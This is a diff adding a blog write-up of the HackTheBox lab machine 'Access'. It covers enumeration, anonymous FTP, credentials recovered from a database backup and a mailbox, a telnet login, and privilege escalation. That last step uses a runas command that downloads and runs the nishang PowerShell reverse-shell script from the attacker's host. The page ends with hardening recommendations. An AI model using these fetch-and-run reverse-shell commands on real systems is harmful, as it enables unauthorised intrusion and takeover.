add: writeup-ctf

content/writeup-ctf/writeup-access-htb/index.md

@@ -0,0 +1,106 @@
+---
+title: "Writeup - Access (HTB)"
+date: 2022-04-15
+slug: "writeup-access-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.98
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 21/tcp : FTP
+- 23/tcp : telnet
+- 80/tcp : HTTP web server (httpd 7.5)
+
+![](img/image-2.webp)
+
+## Exploit
+
+In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`.
+
+![](img/image-3.webp)
+
+There are 2 folders in which we find the following files:
+- Access Control.zip
+- backup.mdb
+
+{{< alert >}}
+Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`:
+{{< /alert >}}
+
+![](img/image-4.webp)
+
+In the different tables I find `auth_user`, interesting there could be credencial for an account.
+
+![](img/image-5.webp)
+
+I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive.
+
+In the archive I find a `.pst`. To read its contents I use the following command:
+
+
+```bash
+readpst Access\ Control.pst -M
+```
+Among the different mails I find the following content:
+
+![](img/image-6.webp)
+
+A new password ! I try to connect to the telnet server with these credencials.
+
+![](img/image-7.webp)
+
+I now have a shell as `security` and I can get the first flag.
+
+![](img/image-8.webp)
+
+## Privilege escalation
+
+After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`.
+
+![](img/image-9.webp)
+
+I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file.
+
+
+```bash
+Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234
+```
+I then launch a web server on my machine.
+
+
+```bash
+python3 -m http.server 80
+```
+Then I download/run the script with the admin runas.
+
+
+```bash
+runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')"
+```
+I now have a reverse shell as Administrator!
+
+![](img/image-10.webp)
+
+So I can get the last flag back.
+
+![](img/image-11.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not let the `anonymous` user enable in FTP server configuration
+- Do not store sensitive information in a folder accessible by several people via FTP/web/...
+- Do not give runas Administrator permission to a user